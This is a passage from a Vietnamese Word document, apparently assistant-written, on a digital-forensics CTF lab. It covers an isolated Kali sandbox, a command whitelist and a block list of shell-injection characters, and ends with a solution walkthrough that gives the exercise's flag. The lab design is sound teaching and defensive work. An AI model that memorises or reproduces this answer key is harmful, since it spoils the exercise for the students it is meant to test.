    <w:p w14:paraId="1A1EAAD2" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Khi khởi động Sandbox (Docker), hệ thống kích hoạt một container chạy hệ điều hành Kali Linux cô lập (không có mạng - `network_mode="none"`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C0B70" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Các lệnh được gửi thông qua API `/api/sandbox/exec/2` (xem [app.py:L672](file:///c:/ForensicsLab/app.py#L672)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F96AA" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Lệnh chạy dưới quyền người dùng an toàn `nobody` để tránh leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D63BC77" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Các lệnh được kiểm tra bảo mật thông qua một **Danh sách trắng (Whitelist)**: chỉ cho phép các lệnh như `fls`, `icat`, `mmls`, `strings`, `md5sum`... và chặn các ký tự đặc biệt (`|`, `;`, `&amp;&amp;`, `&gt;`, `$()`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264210BA" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Điểm số (Multiplier):** Nếu học viên giải flag thành công khi Docker đang chạy, điểm sẽ được nhân với hệ số **1.0 (nhận 100% điểm của câu hỏi)**.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F886DD6" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>2.  **Chế độ Giả lập (Simulated Mode):**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA8269" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Nếu máy chủ không cài đặt Docker hoặc học viên không khởi động Sandbox, các lệnh học viên nhập trên trình duyệt sẽ được chạy bằng Javascript thuần (xem [terminal.js:L202](file:///c:/ForensicsLab/static/js/terminal.js#L202)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299BD8E" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   Các câu lệnh giả lập vẫn sẽ phân tích cú pháp và trả về đầu ra tương ứng (như `fls` hay `icat 3089`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09A808" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Điểm số (Multiplier):** Khi học viên giải flag thành công ở chế độ này, điểm số sẽ được nhân với hệ số **0.6 (chỉ nhận 60% số điểm tối đa)** nhằm khuyến khích sử dụng Docker Sandbox thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308024A2" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="3F0A19B7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01896A89" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="0FC8B036" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>## 5. Tổng kết Hành trình Điều tra (Walkthrough)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211CC211" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="674DB8DD" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>```mermaid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9DEB3" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>graph TD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1441C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    A[Bắt đầu điều tra] --&gt; B[Xác minh tính toàn vẹn file suspect_disk.E01]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE99CD" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    B --&gt;|md5sum suspect_disk.E01| C[Thu được mã MD5: dab05fdce91ee2ff2de2269c837e77b8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F06B7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    C --&gt; D[Liệt kê cấu trúc thư mục của đĩa]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715191FD" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    D --&gt;|fls suspect_disk.E01| E[Phát hiện tệp secret_flag.txt bị xóa ở Inode 3089]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A8C52" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    E --&gt; F[Khôi phục nội dung tệp tin đã xóa]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C617E7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    F --&gt;|icat suspect_disk.E01 3089| G[Thu được Flag: FLAG{d1sk_f0r3ns1cs_is_fun}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8FEB42" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4123DB" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="4D7FDDBF" w14:textId="01098385" w:rsidR="00412798" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>Bản phân tích này cung cấp đầy đủ thông tin về mặt sư phạm, cấu trúc kỹ thuật và lời giải cho **Kịch bản 2**. Nếu bạn cần thêm bất kỳ thông tin nào khác liên quan đến việc tối ưu hóa hoặc chỉnh sửa kịch bản này, hãy cho tôi biết!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00412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6F6"/>
    <w:rsid w:val="002F0872"/>
    <w:rsid w:val="00412798"/>
    <w:rsid w:val="006A46F6"/>
    <w:rsid w:val="00FA7C5C"/>
    <w:rsid w:val="00FF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073BA3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5464209D-8C5C-4E8B-AD23-4E32251C2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6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6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1156</Words>
  <Characters>6593</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>54</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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bean salizar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bean salizar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-02T08:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-02T08:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>